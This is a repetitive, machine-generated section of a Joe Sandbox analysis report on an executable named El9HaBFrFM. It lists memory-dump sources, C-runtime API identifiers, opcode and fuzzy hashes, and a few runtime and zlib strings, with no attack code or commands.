                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f298a274bc8e03f4046c82add987d87bd82ab5ba2314ab19afe7e84179069e03
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD1D022E1876286E720EF2ADC411B96761EF84784F848176EF4EC7696EF3DE841C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 55eea416681c13cdf040abc439ccdb9edd9fdaa6947950bc24db9b922e97bd58
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88313B36A18F8186DB608F29E8402AE73A5FB88758F540275EF9D83B95EF3CD145CB00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 77ecde02e2222b3ce888ce6eec87bfb90815eca06c682fd3ad276086d19994d0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39B1B326B18BA642EA61DB2A99001B9A391EB84BE4F445172EF5DC7BC5FF3CE441D700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EAA
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EBB
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5ECC
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55DC
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e9805c4be31e5b39c27ff3516daa43b4c3e82a988c4f31863cc655d583939484
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72517F32E1876286E720DF2AEC815B96761FB88784F4451B6EF4EC7696EF3CE4418740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 76e6d5358ccfd4d67dad92eb48791a992a72e30a35c3a726a8f86720c62717aa
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30110322B14B168AEB009F65E8542A973A4FB59758F440E31EF6DC67A4EF7CD198C340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: db01bed8cd7ffdbd9e0b0ece61dfe1888db4fd25b8776c5f34d9a18de135f502
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68C1B172B1D7A687E7248F29A44866AF7A1F794B84F458135DF4AC3784EE3DE801CB40
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1127688429
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 893c83723818e525ffd1c124244fe072a0f9b74b9df91f7fc960b1939e91825b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF14F63E187E58BEBA58B19C088A3E3AAAEF44744F064578DF49D7790DF38D941CB40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3ff2bb4fc4c1442f418f77271b80bd903212e53357afe62ff9864dc167963d0f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CB12677A04B998AEB198F2DC85636C3BA0F784B48F168961DB5DC37A4DF39D451C700
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a47b99c23a6bbaa53f651c38d00c4c3ae7efe44057b006d0751e640cc37d7f62
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20E17F32A08E6686EB68CE2D815013937A2FF45B48FA45379DF4EC7A94DF39E851C740
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-900081337
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6900410b13d1eaf9af2331aed199338b000d4246424bc58109057735f9e40d21
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50916473A182D687EBA48E18D458A3E3AAAFB45354F118179DF4AC67D0DF3CE940CB41
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 634273dae3e47342c8d7cbefe51a6c4f035f277b436ab40b16c26c998c436eda
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A512662B1CAC586E7258F3E9801769BB92E744B94F889372CF98C7AC5CE3DD4458701
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                                                                                                        • Instruction ID: add518d4a3d1752e1dd203a02cc6a57568a8770430ca65695c8173cea22a6c92
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D802E521F1DBA751FE65EB1D98402792681AF46BA0F4586B5EF6DC73D2EE3CE8008310
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 639dea87f55d1187d24de812887bd949dafc9e1e178b7da1dbc7b21eeae3e485
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52A14662B08BCA86EB21CF29A4007AA7B92EB55BC4F458272DF8DC7785DE3DD501C701
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: TMP
